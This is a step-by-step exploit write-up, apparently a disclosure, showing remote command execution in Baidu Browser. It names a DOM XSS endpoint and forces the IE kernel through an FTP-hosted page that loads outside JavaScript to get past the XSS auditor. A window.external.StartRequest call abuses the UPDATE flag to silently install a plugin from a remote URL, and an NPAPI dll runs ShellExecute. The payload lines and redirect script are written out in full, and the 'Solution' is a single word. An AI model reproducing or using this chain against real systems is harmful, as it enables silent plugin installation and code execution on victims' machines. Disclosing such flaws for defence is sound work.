Baidu Browser Remote Command Execution

Baidu Browser Remote Command Execution

 

1. According to the general test idea, first we find the privileged domain, including bdbrowser: //, http://xapp.baidu.com.



2. then we need to find the available XSS under these two privileged domains, and there is no obvious available place In the bdbrow.com domain, and then start to find xapp.baidu.com. After some searches, a dom xss point is found.



Http://xapp.baidu.com/browserextension/single/sinaweibo/auth.php#access_token=



3. Unfortunately, this dom xss will be intercepted by chrome's xss auditor.


 

4. What should I do if I continue to find other XSS points and cannot bypass the XSS filter?



Baidu browser is dual-core, and the IE kernel does not intercept this dom xss. We can force Baidu browser to use the IE kernel so that this XSS can play a role.



5. After a period of time, it is found that the IE mode is mandatory when the browser loads the ftp page.


 

6. the ftp protocol can also access the Web page. Therefore, we can use the ftp protocol to embed the XSS page to achieve the effect. Set up an anonymous ftp in the virtual machine to get the url:



Ftp: // 192.168.1.107/test/bdbrowser.htm



The content is as follows:

This page calls the external JS file http: // 192.168.1.20/test/bdbrow.js



The subsequent code is written in bdbrow.js, for example, alert (document. domain);. You can see that js is successfully executed.


 






7. What we need to do next is how to implement remote command execution from alert.



8. Through some research on the APIS provided by external, I focused on plug-in installation. A typical plug-in installation request function includes the following content:
window.external.StartRequest(222,"AppService.AppMarket.DownloadPack","(function(id,res){alert(res)})","{\"ID\":\"pbhcaodfcnjnjnbfpagkgjncknmhelll\",\"UPDATE\":\"false\",\"URL\":\"http://dlsw.br.baidu.com/9a8fea874f8419d2281f7bb2d7cf7883.crx\"}",window,"");




The following message is displayed:


 





This "installation confirmation box" is obviously not what we want to see...



Is there a way to go around?



9. I guess that the true/false values of the Update parameter in the data are used to control whether to Update a plug-in or install a plug-in. If it is to Update a plug-in, isn't the "installation" prompt displayed?



So I used my own chrome plug-in to perform a test.
window.external.StartRequest(222,"AppService.AppMarket.DownloadPack","(function(id,res){alert(res)})","{\"ID\":\"Silenter\",\"UPDATE\":\"true\",\"URL\":\"http://x.com/swf_collector.crx\"}",window,"");




The ID is the built-in plug-in ID of Baidu browser, UPDATE is set to true, and URL is set to our plug-in address. As you can see, the plug-in is successfully installed.


 





10. In this step, we have been able to remotely install any plug-in, and then use the plug-in to execute system commands.



11. Using the npapi, I simply wrote a dll and executed calc using shellexecute.
 
void CmdRunPluginAPI::run(const std::string& val){ShellExecute(NULL,L"",L"calc.exe",NULL,NULL,SW_SHOW);}


12. Next we will call this dll using the chrome plug-in. For details, see the npapi documentation in chrome plug-in development.


13. Let the victim access a page. After the page automatically jumps to the ftp page, the plug-in will be automatically installed:



The Code is as follows:
<script>location.href="ftp://192.168.1.107/test/bdbrowser.htm";</script>
 





14. When the victim visits a webpage at will, the local calculator is executed:


 

 
 
Solution:
Filter